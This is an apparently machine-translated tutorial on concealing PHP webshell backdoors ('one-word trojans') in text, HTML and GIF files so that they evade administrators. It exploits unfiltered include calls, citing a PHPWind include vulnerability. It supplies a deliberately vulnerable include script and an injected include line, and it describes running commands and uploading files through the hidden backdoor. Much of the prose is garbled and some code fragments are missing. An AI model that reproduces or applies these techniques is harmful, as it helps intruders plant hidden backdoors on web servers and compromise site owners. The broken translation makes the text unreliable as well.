Recently a lot of friends are asking me if I can hide my one-word trojan in HTML or picture, in fact, a word trojan inserted into the PHP file has been very covert, if you just want to put into the HTML file or picture, and then read down the test report it.
You know, if you put the PHP statements in the picture, you can't do it anyway, because PHP only resolves files that have the extension PHP. So be able to make the PHP statement hidden in the picture executed. We have recourse to the call function in PHP: Include, require, and so on.
We still remember the previous days to hide the Trojan to the picture of the article bar. That is, in the PHP file with include ("x.gif") such statements to invoke hidden in the picture of the Trojan. The statements in ASP are similar. Seemingly very covert but call pictures directly to people who know a little bit about PHP is not difficult to find suspicious. Because the URL in the get way difficult to pass parameters, which makes the performance of the Trojan can not be played.
Include functions are used more frequently in PHP, so there are also a lot of security issues, such as PHPWIND1.36 vulnerabilities because the variables behind include are not filtered. This allows us to construct similar statements to insert into the PHP file. Then hide the trojan in the picture or HTML file, you can say that the concealment is even higher. Insert the following statement in the Phpwind forum:
@include includ/$PHPWIND _root;?>
The general administrator is not able to see it.
With the include function to help us, we can hide the PHP trojan in many types of files, such as TXT, HTML, and picture files. Because TXT, HTML and picture files of these three types of files in the forum or article system is the most common, the following we will do the test in turn.
First set up a php file test.php file content is:
$test =$_get[' test '];
@include ' test/'. $test;
TXT file is generally a description file, so we put a word Trojan into the directory of the description file OK. Casually create a TXT file t.txt. We pasted a word trojan into the T.txt file. Then visit hxxp://localhost/test/test.php?test=. /t.txt If you see the contents of T.txt OK, then add the Lanker mini PHP backdoor client Trojan address to hxxp://localhost/test/test.php?test=. /t.txt Password added to cmd on it, the results of the implementation of the return can be seen.
For HTML files, this is typically a template file. In order for the Trojan to be inserted into the HTML file to be invoked and not displayed, we can add a text box with a hidden attribute in HTML, such as: Then use the method above. The results of the return of the execution can generally be viewed from the source file. Use to view this program directory function. View source file contents As I can get the directory for c:uniserver2_7swwwtest.
Below we say the picture file, to say the most poisonous one trick is to hide the trojan in the picture. We can edit a picture directly and insert it at the end of the picture.
The test generally does not affect the picture. Then the same method client Trojan address added
We look at the PHP environment variable Returns the result is the original picture.
There may be a gap between the results we imagined, the command has been run, but the return results are not visible, because this is a real GIF file, so it will not show the return results, in order to verify that the implementation of the command we execute the upload file command. As expected, the file was successfully uploaded to the server. The advantage of this forgery is good concealment. The disadvantage also naturally needless to say is not echo. If you want to see the results returned, take out a notepad and forge a fake picture file.